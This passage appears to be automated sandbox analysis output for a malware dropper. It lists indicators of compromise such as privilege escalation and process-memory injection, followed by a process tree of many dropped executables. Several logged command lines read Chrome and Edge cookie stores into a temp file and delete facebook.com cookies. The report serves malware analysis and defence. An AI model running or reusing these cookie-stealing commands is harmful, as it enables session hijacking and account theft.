pid process 3132 -
Suspicious behavior: MapViewOfSection 64 IoCs
Processes:
35SM90SrdCDhcnMYcnmUgvQl.exeexplorer.exepid process 5516 35SM90SrdCDhcnMYcnmUgvQl.exe 3132 3132 3132 3132 3132 3132 3132 3132 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 3132 3132 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 3132 3132 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 3132 3132 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 3132 3132 3132 3132 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Z2gmdquIX3wKlYS1tpRskviY.exec7KFBhJ4C17IfmS3rpbMCPnF.exen6cHDpHKzQsbua1IL51TbmFA.exeWerFault.exepowershell.exe1292224.exe7zjNlw_VPADMMitd8gFCCZA1.exe4415806.exefvYN9hKmk9UGZV9RxKdwgODO.exeQtaJGwHPddqgej6FX70BDYa9.exe7JRNCYc9Q4d4F6qCkPC_NHYW.exe5Mp1TdghewUnofPglzyG2WAq.exemd8_8eus.exedescription pid process Token: SeDebugPrivilege 2116 Z2gmdquIX3wKlYS1tpRskviY.exe Token: SeDebugPrivilege 1856 c7KFBhJ4C17IfmS3rpbMCPnF.exe Token: SeDebugPrivilege 2080 n6cHDpHKzQsbua1IL51TbmFA.exe Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeRestorePrivilege 5920 WerFault.exe Token: SeBackupPrivilege 5920 WerFault.exe Token: SeBackupPrivilege 5920 WerFault.exe Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeDebugPrivilege 5720 powershell.exe Token: SeDebugPrivilege 5392 1292224.exe Token: SeDebugPrivilege 1684 7zjNlw_VPADMMitd8gFCCZA1.exe Token: SeDebugPrivilege 5612 4415806.exe Token: SeDebugPrivilege 5624 fvYN9hKmk9UGZV9RxKdwgODO.exe Token: SeDebugPrivilege 1332 QtaJGwHPddqgej6FX70BDYa9.exe Token: SeDebugPrivilege 4112 7JRNCYc9Q4d4F6qCkPC_NHYW.exe Token: SeDebugPrivilege 5672 5Mp1TdghewUnofPglzyG2WAq.exe Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeManageVolumePrivilege 5816 md8_8eus.exe Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 Token: SeCreatePagefilePrivilege 3132 Token: SeShutdownPrivilege 3132 -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
KcI_K2fAIjh0nUxCOwxYf0dW.exeCleaner Installation.exeGameBoxWin64.exeWeather Installation.exeultramediaburner.tmpinstaller.exemsedge.exeWeather.exemsedge.exepid process 3440 KcI_K2fAIjh0nUxCOwxYf0dW.exe 3912 Cleaner Installation.exe 4452 GameBoxWin64.exe 5084 Weather Installation.exe 5152 ultramediaburner.tmp 6824 installer.exe 5176 msedge.exe 5520 Weather.exe 4640 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WerFault.exepid process 2980 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Installation.exe35SM90SrdCDhcnMYcnmUgvQl.exedescription pid process target process PID 3832 wrote to memory of 1416 3832 Installation.exe giF6kyVuHkhMBN_DFw4d_fQJ.exe PID 3832 wrote to memory of 1416 3832 Installation.exe giF6kyVuHkhMBN_DFw4d_fQJ.exe PID 3832 wrote to memory of 1416 3832 Installation.exe giF6kyVuHkhMBN_DFw4d_fQJ.exe PID 3832 wrote to memory of 1332 3832 Installation.exe QtaJGwHPddqgej6FX70BDYa9.exe PID 3832 wrote to memory of 1332 3832 Installation.exe QtaJGwHPddqgej6FX70BDYa9.exe PID 3832 wrote to memory of 1332 3832 Installation.exe QtaJGwHPddqgej6FX70BDYa9.exe PID 3832 wrote to memory of 1476 3832 Installation.exe B_v7FbFMaCVtguWH_z__hkT1.exe PID 3832 wrote to memory of 1476 3832 Installation.exe B_v7FbFMaCVtguWH_z__hkT1.exe PID 3832 wrote to memory of 1476 3832 Installation.exe B_v7FbFMaCVtguWH_z__hkT1.exe PID 3832 wrote to memory of 1212 3832 Installation.exe 1z1s63Py6Cqed7KrMAeFLiN2.exe PID 3832 wrote to memory of 1212 3832 Installation.exe 1z1s63Py6Cqed7KrMAeFLiN2.exe PID 3832 wrote to memory of 1212 3832 Installation.exe 1z1s63Py6Cqed7KrMAeFLiN2.exe PID 3832 wrote to memory of 1648 3832 Installation.exe fvYN9hKmk9UGZV9RxKdwgODO.exe PID 3832 wrote to memory of 1648 3832 Installation.exe fvYN9hKmk9UGZV9RxKdwgODO.exe PID 3832 wrote to memory of 1648 3832 Installation.exe fvYN9hKmk9UGZV9RxKdwgODO.exe PID 3832 wrote to memory of 1684 3832 Installation.exe 7zjNlw_VPADMMitd8gFCCZA1.exe PID 3832 wrote to memory of 1684 3832 Installation.exe 7zjNlw_VPADMMitd8gFCCZA1.exe PID 3832 wrote to memory of 1684 3832 Installation.exe 7zjNlw_VPADMMitd8gFCCZA1.exe PID 3832 wrote to memory of 1760 3832 Installation.exe 35SM90SrdCDhcnMYcnmUgvQl.exe PID 3832 wrote to memory of 1760 3832 Installation.exe 35SM90SrdCDhcnMYcnmUgvQl.exe PID 3832 wrote to memory of 1760 3832 Installation.exe 35SM90SrdCDhcnMYcnmUgvQl.exe PID 3832 wrote to memory of 1848 3832 Installation.exe 5Mp1TdghewUnofPglzyG2WAq.exe PID 3832 wrote to memory of 1848 3832 Installation.exe 5Mp1TdghewUnofPglzyG2WAq.exe PID 3832 wrote to memory of 1848 3832 Installation.exe 5Mp1TdghewUnofPglzyG2WAq.exe PID 3832 wrote to memory of 1856 3832 Installation.exe c7KFBhJ4C17IfmS3rpbMCPnF.exe PID 3832 wrote to memory of 1856 3832 Installation.exe c7KFBhJ4C17IfmS3rpbMCPnF.exe PID 3832 wrote to memory of 1940 3832 Installation.exe 7JRNCYc9Q4d4F6qCkPC_NHYW.exe PID 3832 wrote to memory of 1940 3832 Installation.exe 7JRNCYc9Q4d4F6qCkPC_NHYW.exe PID 3832 wrote to memory of 1940 3832 Installation.exe 7JRNCYc9Q4d4F6qCkPC_NHYW.exe PID 3832 wrote to memory of 2116 3832 Installation.exe Z2gmdquIX3wKlYS1tpRskviY.exe PID 3832 wrote to memory of 2116 3832 Installation.exe Z2gmdquIX3wKlYS1tpRskviY.exe PID 3832 wrote to memory of 2080 3832 Installation.exe n6cHDpHKzQsbua1IL51TbmFA.exe PID 3832 wrote to memory of 2080 3832 Installation.exe n6cHDpHKzQsbua1IL51TbmFA.exe PID 3832 wrote to memory of 1632 3832 Installation.exe RTqQYcYpcB8ukNlxo66LwG9g.exe PID 3832 wrote to memory of 1632 3832 Installation.exe RTqQYcYpcB8ukNlxo66LwG9g.exe PID 3832 wrote to memory of 1632 3832 Installation.exe RTqQYcYpcB8ukNlxo66LwG9g.exe PID 3832 wrote to memory of 3192 3832 Installation.exe Jc4yVtEOotyL__khOXuqTI3o.exe PID 3832 wrote to memory of 3192 3832 Installation.exe Jc4yVtEOotyL__khOXuqTI3o.exe PID 3832 wrote to memory of 3192 3832 Installation.exe Jc4yVtEOotyL__khOXuqTI3o.exe PID 3832 wrote to memory of 3464 3832 Installation.exe KcI_K2fAIjh0nUxCOwxYf0dW.exe PID 3832 wrote to memory of 3464 3832 Installation.exe KcI_K2fAIjh0nUxCOwxYf0dW.exe PID 3832 wrote to memory of 3464 3832 Installation.exe KcI_K2fAIjh0nUxCOwxYf0dW.exe PID 3832 wrote to memory of 4668 3832 Installation.exe Q1Ao_fBAsTY9AXieWLrh4ZmG.exe PID 3832 wrote to memory of 4668 3832 Installation.exe Q1Ao_fBAsTY9AXieWLrh4ZmG.exe PID 3832 wrote to memory of 4668 3832 Installation.exe Q1Ao_fBAsTY9AXieWLrh4ZmG.exe PID 3832 wrote to memory of 2396 3832 Installation.exe rnMygaJY9bsTe76aVZpyXwUC.exe PID 3832 wrote to memory of 2396 3832 Installation.exe rnMygaJY9bsTe76aVZpyXwUC.exe PID 3832 wrote to memory of 2396 3832 Installation.exe rnMygaJY9bsTe76aVZpyXwUC.exe PID 3832 wrote to memory of 4856 3832 Installation.exe f2Ahm4zYweQaGU_apxXy4wJA.exe PID 3832 wrote to memory of 4856 3832 Installation.exe f2Ahm4zYweQaGU_apxXy4wJA.exe PID 3832 wrote to memory of 4856 3832 Installation.exe f2Ahm4zYweQaGU_apxXy4wJA.exe PID 3832 wrote to memory of 3764 3832 Installation.exe McBIlPMIcehCj1VhnlSA1XBu.exe PID 3832 wrote to memory of 3764 3832 Installation.exe McBIlPMIcehCj1VhnlSA1XBu.exe PID 3832 wrote to memory of 2524 3832 Installation.exe rJDFkFv9mmHHWASOw8beydwV.exe PID 3832 wrote to memory of 2524 3832 Installation.exe rJDFkFv9mmHHWASOw8beydwV.exe PID 3832 wrote to memory of 2524 3832 Installation.exe rJDFkFv9mmHHWASOw8beydwV.exe PID 3832 wrote to memory of 1328 3832 Installation.exe 5vMgVG9zA4l9mWyov7brGSyH.exe PID 3832 wrote to memory of 1328 3832 Installation.exe 5vMgVG9zA4l9mWyov7brGSyH.exe PID 3832 wrote to memory of 1328 3832 Installation.exe 5vMgVG9zA4l9mWyov7brGSyH.exe PID 3832 wrote to memory of 1436 3832 Installation.exe EsxhG3_gIGbvwAFN8myBZi8b.exe PID 3832 wrote to memory of 1436 3832 Installation.exe EsxhG3_gIGbvwAFN8myBZi8b.exe PID 3832 wrote to memory of 1436 3832 Installation.exe EsxhG3_gIGbvwAFN8myBZi8b.exe PID 1760 wrote to memory of 5516 1760 35SM90SrdCDhcnMYcnmUgvQl.exe 35SM90SrdCDhcnMYcnmUgvQl.exe PID 1760 wrote to memory of 5516 1760 35SM90SrdCDhcnMYcnmUgvQl.exe 35SM90SrdCDhcnMYcnmUgvQl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe"C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exeC:\Users\Admin\Documents\5Mp1TdghewUnofPglzyG2WAq.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"C:\Users\Admin\Documents\35SM90SrdCDhcnMYcnmUgvQl.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe"C:\Users\Admin\Documents\7zjNlw_VPADMMitd8gFCCZA1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe"C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exeC:\Users\Admin\Documents\fvYN9hKmk9UGZV9RxKdwgODO.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"C:\Users\Admin\Documents\1z1s63Py6Cqed7KrMAeFLiN2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exe"C:\Users\Admin\Documents\B_v7FbFMaCVtguWH_z__hkT1.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exe"C:\Users\Admin\Documents\EsxhG3_gIGbvwAFN8myBZi8b.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\c7KFBhJ4C17IfmS3rpbMCPnF.exe"C:\Users\Admin\Documents\c7KFBhJ4C17IfmS3rpbMCPnF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe"C:\Users\Admin\Documents\giF6kyVuHkhMBN_DFw4d_fQJ.exe" -q3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe"C:\Users\Admin\Documents\QtaJGwHPddqgej6FX70BDYa9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exe"C:\Users\Admin\Documents\5vMgVG9zA4l9mWyov7brGSyH.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 3003⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe"C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exeC:\Users\Admin\Documents\7JRNCYc9Q4d4F6qCkPC_NHYW.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Z2gmdquIX3wKlYS1tpRskviY.exe"C:\Users\Admin\Documents\Z2gmdquIX3wKlYS1tpRskviY.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\n6cHDpHKzQsbua1IL51TbmFA.exe"C:\Users\Admin\Documents\n6cHDpHKzQsbua1IL51TbmFA.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1292224.exe"C:\Users\Admin\AppData\Roaming\1292224.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5392 -s 23124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4415806.exe"C:\Users\Admin\AppData\Roaming\4415806.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\RTqQYcYpcB8ukNlxo66LwG9g.exe"C:\Users\Admin\Documents\RTqQYcYpcB8ukNlxo66LwG9g.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1632 -s 2963⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Jc4yVtEOotyL__khOXuqTI3o.exe"C:\Users\Admin\Documents\Jc4yVtEOotyL__khOXuqTI3o.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 3203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"C:\Users\Admin\Documents\KcI_K2fAIjh0nUxCOwxYf0dW.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Documents\Q1Ao_fBAsTY9AXieWLrh4ZmG.exe"C:\Users\Admin\Documents\Q1Ao_fBAsTY9AXieWLrh4ZmG.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\rnMygaJY9bsTe76aVZpyXwUC.exe"C:\Users\Admin\Documents\rnMygaJY9bsTe76aVZpyXwUC.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2963⤵
- Program crash
-
C:\Users\Admin\Documents\f2Ahm4zYweQaGU_apxXy4wJA.exe"C:\Users\Admin\Documents\f2Ahm4zYweQaGU_apxXy4wJA.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\McBIlPMIcehCj1VhnlSA1XBu.exe"C:\Users\Admin\Documents\McBIlPMIcehCj1VhnlSA1XBu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
